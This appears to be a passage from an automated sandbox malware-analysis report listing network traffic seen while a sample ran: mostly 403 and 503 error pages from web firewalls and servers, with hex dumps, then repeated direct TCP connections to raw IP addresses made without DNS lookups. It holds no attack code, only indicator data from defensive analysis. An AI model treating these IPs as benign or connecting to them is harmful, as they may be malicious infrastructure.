1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2751", 1685537539, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:21 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HeKljUb4InMedfkW7BsqUOk91tqyCbaaJRzE0zjeDtPAnudksABPYtxteeG2sCDsJwu02YkqpNHz8N86MjWa7j9PAuAmYRV7qLru9ce8CS9fA954rGkfe53X2Sg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a8468de2c3a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 31 May 2023 12:52:25 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:52:26 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: GqXi6E9r/x2HePas7Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tNso%2FFXlGnzM4dkkp9KtzpIqVP%2BW%2FJdj%2FfCNNiy%2Bj3sUzjg6Ix3V%2FSbPlxb78lQ%2FEIr2%2FUaPZBMncZq%2FPsxasUYkGen%2BBUv53bCilqD%2FFxyYt2Jmli1mCx4%2B%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5aa9bff39b37-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c Data Ascii: 1925<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</titl
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 31 May 2023 12:52:29 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
